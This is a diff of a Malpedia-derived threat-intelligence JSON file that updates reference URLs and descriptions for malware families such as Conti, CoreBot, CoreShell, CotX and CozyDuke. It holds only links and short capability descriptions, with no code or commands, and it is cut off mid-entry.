"https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/", - "https://www.threatstop.com/blog/conti-ransomware-source-code-leaked", - "https://blogs.vmware.com/security/2022/09/threat-report-illuminating-volume-shadow-deletion.html", - "https://www.prevailion.com/what-wicked-webs-we-unweave/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks", - "https://www.youtube.com/watch?v=hmaWy9QIC7c", - "https://0xthreatintel.medium.com/reversing-conti-ransomware-bfce15019e74", - "https://threatpost.com/affiliate-leaks-conti-ransomware-playbook/168442/", - "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one", - "https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/", - "https://blog.talosintelligence.com/2022/05/conti-and-hive-ransomware-operations.html", - "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", - "https://cyware.com/news/ransomware-becomes-deadlier-conti-makes-the-most-money-39e17bae/", - "https://news.sophos.com/en-us/2022/02/22/cyberthreats-during-russian-ukrainian-tensions-what-can-we-learn-from-history-to-be-prepared/", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", - "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/", - "https://news.sophos.com/en-us/2021/02/16/conti-ransomware-attack-day-by-day/", - "https://www.bleepingcomputer.com/news/security/angry-conti-ransomware-affiliate-leaks-gangs-attack-playbook/", - "https://www.prodaft.com/m/reports/Conti_TLPWHITE_v1.6_WVcSEtc.pdf", - "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-sound-of-malware.html", - "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf?1651576098", - "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf", - "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/", - "https://intel471.com/blog/conti-vs-monti-a-reinvention-or-just-a-simple-rebranding", - "https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/", - "https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://intel471.com/blog/shipping-companies-ransomware-credentials", - "https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/", - "https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/", - "https://www.advintel.io/post/hydra-with-three-heads-blackbyte-the-future-of-ransomware-subsidiary-groups", - "https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks", - "https://cluster25.io/2022/03/02/contis-source-code-deep-dive-into/", - "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", - "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide", - "https://github.com/TheParmak/conti-leaks-englished", - "https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked", - "https://twitter.com/AltShiftPrtScn/status/1417849181012647938", - "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again", - "https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love", - "https://www.youtube.com/watch?v=uORuVVQzZ0A", - "https://www.bleepingcomputer.com/news/security/conti-ransomware-gang-takes-over-trickbot-malware-operation/", - "https://www.elliptic.co/blog/conti-ransomware-nets-at-least-25.5-million-in-four-months", - "https://www.mbsd.jp/2022/03/08/assets/images/MBSD_Summary_of_ContiLeaks_Rev3.pdf", - "https://www.zscaler.com/blogs/security-research/conti-ransomware-attacks-persist-updated-version-despite-leaks", - "https://twitter.com/TheDFIRReport/status/1498642512935800833", - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022", - "https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf", - "https://www.redhotcyber.com/post/il-ransomware-conti-si-schiera-a-favore-della-russia", + "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks", + "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships", + "https://www.bankinfosecurity.com/cybercrime-moves-conti-ransomware-absorbs-trickbot-malware-a-18573", + "https://thedfirreport.com/2021/05/12/conti-ransomware/", + "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", + "https://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html", + "https://github.com/whichbuffer/Conti-Ransomware-IOC", + "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire", "https://www.mbsd.jp/research/20210413/conti-ransomware/", - "https://github.com/cdong1012/ContiUnpacker", - "https://thehackernews.com/2022/05/malware-analysis-trickbot.html", - "https://twitter.com/AltShiftPrtScn/status/1350755169965924352", + "https://nakedsecurity.sophos.com/2021/08/06/conti-ransomware-affiliate-goes-rogue-leaks-company-data/", + "https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations", + "https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://thedfirreport.com/2021/12/13/diavol-ransomware/", - "https://twitter.com/AltShiftPrtScn/status/1423188974298861571", - "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/", + "https://www.threatstop.com/blog/conti-ransomware-source-code-leaked", + "https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-powershell-proxyshell-conti-ttps-oh-my", + "https://www.bleepingcomputer.com/news/security/angry-conti-ransomware-affiliate-leaks-gangs-attack-playbook/", + "https://www.eldiario.es/tecnologia/capos-cibercrimen-avisan-contratacaran-si-hackea-rusia_1_8795458.html", + "https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/", + "https://twitter.com/AltShiftPrtScn/status/1350755169965924352", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf", + "https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf?1651576098", + "https://www.redhotcyber.com/post/il-ransomware-conti-si-schiera-a-favore-della-russia", + "https://intel471.com/blog/shipping-companies-ransomware-credentials", + "https://securityaffairs.com/141666/cyber-crime/lockbit-green-ransomware-variant.html", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks", + "https://www.bleepingcomputer.com/news/security/ryuk-successor-conti-ransomware-releases-data-leak-site/", + "https://www.cyberscoop.com/ransomware-gang-conti-bounced-back/", + "https://www.darktrace.com/en/blog/the-double-extortion-business-conti-ransomware-gang-finds-new-avenues-of-negotiation/", + "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/", + "https://www.ic3.gov/Media/News/2021/210521.pdf", + "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-sound-of-malware.html", + "https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks", + "https://www.bleepingcomputer.com/news/security/hhs-conti-ransomware-encrypted-80-percent-of-irelands-hse-it-systems/", + "https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/", "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/", "https://share.vx-underground.org/Conti/", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/", + "https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf", "https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://securityaffairs.co/wordpress/128190/cyber-crime/conti-ransomware-takes-over-trickbot.html", - "https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations", - "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://therecord.media/disgruntled-ransomware-affiliate-leaks-the-conti-gangs-technical-manuals/", - "https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger", - "https://www.bleepingcomputer.com/news/security/ryuk-successor-conti-ransomware-releases-data-leak-site/", + "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/", + "https://medium.com/@whickey000/how-i-cracked-conti-ransomware-groups-leaked-source-code-zip-file-e15d54663a8", + "https://cluster25.io/2022/03/02/contis-source-code-deep-dive-into/", + "https://twitter.com/AltShiftPrtScn/status/1417849181012647938", + "https://www.advintel.io/post/24-hours-from-log4shell-to-local-admin-deep-dive-into-conti-gang-attack-on-fortune-500-dfir", + "http://chuongdong.com/reverse%20engineering/2020/12/15/ContiRansomware/", + "https://www.elliptic.co/blog/conti-ransomware-nets-at-least-25.5-million-in-four-months", + "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", + "https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/", + "https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", + "https://us-cert.cisa.gov/ncas/alerts/aa21-265a", + "https://cocomelonc.github.io/malware/2023/02/10/malware-analysis-8.html", + "https://cocomelonc.github.io/investigation/2022/03/27/malw-inv-conti-1.html", + "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox", + "https://news.sophos.com/en-us/2022/02/28/conti-and-karma-actors-attack-healthcare-provider-at-same-time-through-proxyshell-exploits/?cmp=30728", + "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again", + "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", "https://medium.com/cycraft/the-road-to-ransomware-resilience-c1ca37036efd", + "https://thehackernews.com/2022/05/malware-analysis-trickbot.html", + "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware", + "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", + "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html", + "https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles", + "https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger", + "https://krebsonsecurity.com/2021/10/conti-ransom-gang-starts-selling-access-to-victims/", + "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one", + "https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://www.esentire.com/blog/analysis-of-leaked-conti-intrusion-procedures-by-esentires-threat-response-unit-tru", + "https://www.bleepingcomputer.com/news/security/conti-ransomwares-internal-chats-leaked-after-siding-with-russia/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://securelist.com/luna-black-basta-ransomware/106950", + "https://www.secureworks.com/blog/gold-ulrick-continues-conti-operations-despite-public-disclosures", + "https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLPCLEAR-Staubmann-Busy-Bees.pptx", + "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti", + "https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://therecord.media/conti-leaks-the-panama-papers-of-ransomware/", + "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware", + "https://www.ironnet.com/blog/ransomware-graphic-blog", + "https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider", + "https://news.sophos.com/en-us/2021/02/16/conti-ransomware-evasive-by-nature/", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://github.com/cdong1012/ContiUnpacker", + "https://therecord.media/disgruntled-ransomware-affiliate-leaks-the-conti-gangs-technical-manuals/", + "https://www.mbsd.jp/2022/03/08/assets/images/MBSD_Summary_of_ContiLeaks_Rev3.pdf", + "https://securelist.com/modern-ransomware-groups-ttps/106824/", + "https://threatpost.com/affiliate-leaks-conti-ransomware-playbook/168442/", + "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/", + "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel", + "https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65", + "https://www.advintel.io/post/hydra-with-three-heads-blackbyte-the-future-of-ransomware-subsidiary-groups", + "https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/", + "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", + "https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf", + "https://github.com/EmissarySpider/ransomware-descendants", + "https://www.dragos.com/blog/industry-news/suspected-conti-ransomware-activity-in-the-auto-manufacturing-sector/", + "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide", + "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-1", + "https://0xthreatintel.medium.com/reversing-conti-ransomware-bfce15019e74", + "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html", + "https://arcticwolf.com/resources/blog/conti-ransomware-leak-analyzed", + "https://www.youtube.com/watch?v=cYx7sQRbjGA", + "https://blogs.vmware.com/security/2022/09/threat-report-illuminating-volume-shadow-deletion.html", + "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-group-targets-esxi-hypervisors-with-its-linux-variant.html", + "https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf", + "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/", + "https://www.bleepingcomputer.com/news/security/taiwanese-apple-and-tesla-contractor-hit-by-conti-ransomware/", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://intel471.com/blog/conti-vs-monti-a-reinvention-or-just-a-simple-rebranding", + "https://therecord.media/conti-ransomware-gang-chats-leaked-by-pro-ukraine-member/", + "https://blog.talosintelligence.com/2021/09/Conti-leak-translation.html", + "https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/", + "https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", + "https://www.connectwise.com/resources/conti-profile", + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://www.hse.ie/eng/services/publications/conti-cyber-attack-on-the-hse-full-report.pdf", + "https://blog.talosintelligence.com/2022/05/conti-and-hive-ransomware-operations.html", + "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", + "https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://research.checkpoint.com/2022/leaks-of-conti-ransomware-group-paint-picture-of-a-surprisingly-normal-tech-start-up-sort-of/", + "https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked", + "https://github.com/TheParmak/conti-leaks-englished", + "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-2", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf", + "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", + "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx", + "https://www.bleepingcomputer.com/news/security/conti-ransomware-gang-takes-over-trickbot-malware-operation/", + "https://www.justice.gov/opa/pr/multiple-foreign-nationals-charged-connection-trickbot-malware-and-conti-ransomware", + "https://news.sophos.com/en-us/2021/02/16/what-to-expect-when-youve-been-hit-with-conti-ransomware/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf", + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022", + "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/", + "https://yoroi.company/research/conti-ransomware-source-code-a-well-designed-cots-ransomware/", + "https://arcticwolf.com/resources/blog/conti-and-akira-chained-together/", + "https://news.sophos.com/en-us/2021/02/16/conti-ransomware-attack-day-by-day/", "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/", - "https://www.bleepingcomputer.com/news/security/hhs-conti-ransomware-encrypted-80-percent-of-irelands-hse-it-systems/", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf" + "https://www.bleepingcomputer.com/news/security/hackers-use-contis-leaked-ransomware-to-attack-russian-companies/", + "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/", + "https://assets.sentinelone.com/ransomware-enterprise/conti-ransomware-unpacked", + "https://damonmccoy.com/papers/Ransomware_eCrime22.pdf", + "https://cyware.com/news/ransomware-becomes-deadlier-conti-makes-the-most-money-39e17bae/", + "https://news.sophos.com/en-us/2022/02/22/cyberthreats-during-russian-ukrainian-tensions-what-can-we-learn-from-history-to-be-prepared/", + "https://twitter.com/AltShiftPrtScn/status/1423188974298861571", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://marcoramilli.com/2021/11/07/conti-ransomware-cheat-sheet/", + "https://twitter.com/TheDFIRReport/status/1498642512935800833", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf", + "https://www.prodaft.com/m/reports/Conti_TLPWHITE_v1.6_WVcSEtc.pdf", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti", + "https://www.youtube.com/watch?v=uORuVVQzZ0A", + "https://www.silentpush.com/blog/consequences-the-conti-leaks-and-future-problems", + "https://www.zscaler.com/blogs/security-research/conti-ransomware-attacks-persist-updated-version-despite-leaks", + "https://arcticwolf.com/resources/blog/karakurt-web", + "https://www.prevailion.com/what-wicked-webs-we-unweave/", + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti", + "https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/", + "https://www.coveware.com/blog/2022/1/26/ransomware-as-a-service-innovation-curve", + "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", + "https://www.youtube.com/watch?v=hmaWy9QIC7c", + "https://www.trmlabs.com/post/analysis-corroborates-suspected-ties-between-conti-and-ryuk-ransomware-groups-and-wizard-spider", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://blog.qualys.com/vulnerabilities-threat-research/2021/11/18/conti-ransomware", + "https://medium.com/@arnozobec/analyzing-conti-leaks-without-speaking-russian-only-methodology-f5aecc594d1b", + "https://unit42.paloaltonetworks.com/conti-ransomware-gang/", + "https://cocomelonc.github.io/investigation/2022/04/11/malw-inv-conti-2.html", + "https://redcanary.com/blog/intelligence-insights-november-2021/", + "https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/", + "https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/", + "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape", + "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf", + "https://intel471.com/blog/conti-leaks-cybercrime-fire-team", + "https://www.bleepingcomputer.com/news/security/conti-ransomware-source-code-leaked-by-ukrainian-researcher/", + "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/", + "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/", + "https://securityaffairs.co/wordpress/128190/cyber-crime/conti-ransomware-takes-over-trickbot.html", + "https://lifars.com/wp-content/uploads/2021/10/ContiRansomware_Whitepaper.pdf" ], "synonyms": [], "type": [] @@ -19427,9 +20350,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee", + "https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks", "https://content.fireeye.com/apt/rpt-apt38", - "https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks", - "https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks" + "https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks" ], "synonyms": [ "WHITEOUT" @@ -19474,8 +20397,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot", "https://www.crowdstrike.com/blog/ecrime-ecosystem/", - "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report_BosonSpider.pdf" + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report_BosonSpider.pdf", + "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/" ], "synonyms": [], "type": [] @@ -19488,9 +20411,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coredn", - "https://www.symantec.com/security-center/writeup/2018-021216-4405-99#technicaldescription", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", "https://blog.talosintelligence.com/2019/01/fake-korean-job-posting.html", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://www.symantec.com/security-center/writeup/2018-021216-4405-99#technicaldescription", "https://blog.alyac.co.kr/2105", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/#atricle-content" ], @@ -19505,11 +20428,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell", - "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html", - "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf", + "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/", + "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", "http://malware.prevenity.com/2014/08/malware-info.html" ], "synonyms": [ @@ -19540,8 +20463,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cosmicduke", - "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf", - "https://www.cyfirma.com/outofband/cosmicduke-malware-analysis/" + "https://www.cyfirma.com/outofband/cosmicduke-malware-analysis/", + "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf" ], "synonyms": [], "type": [] @@ -19554,18 +20477,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cotx", - "https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf", - "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", - "https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf", - "https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/", - "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf", - "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology", "https://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html", + "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology", "https://www.youtube.com/watch?v=1WfPlgtfWnQ", - "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf", "https://vblocalhost.com/uploads/VB2020-20.pdf", "https://vb2020.vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf" + "https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", + "https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/", + "https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf", + "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf" ], "synonyms": [], "type": [] @@ -19619,8 +20542,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coviper", - "https://tccontre.blogspot.com/2020/04/covid19-malware-analysis-with-kill-mbr.html", - "https://decoded.avast.io/janrubin/coviper-locking-down-computers-during-lockdown/" + "https://decoded.avast.io/janrubin/coviper-locking-down-computers-during-lockdown/", + "https://tccontre.blogspot.com/2020/04/covid19-malware-analysis-with-kill-mbr.html" ], "synonyms": [], "type": [] @@ -19629,7 +20552,7 @@ "value": "CoViper" }, { - "description": "CozyDuke is not simply a malware toolset; rather, it is a modular malware platform formed around\r\na core backdoor component. This component can be instructed by the C&C server to download\r\nand execute arbitrary modules, and it is these modules that provide CozyDuke with its vast array\r\nof functionality. Known CozyDuke modules include:\r\n• Command execution module for executing arbitrary Windows Command Prompt commands\r\n• Password stealer module\r\n• NT LAN Manager (NTLM) hash stealer module\r\n• System information gathering module\r\n• Screenshot module", + "description": "CozyDuke is not simply a malware toolset; rather, it is a modular malware platform formed around\r\na core backdoor component. This component can be instructed by the C&C server to download\r\nand execute arbitrary modules, and it is these modules that 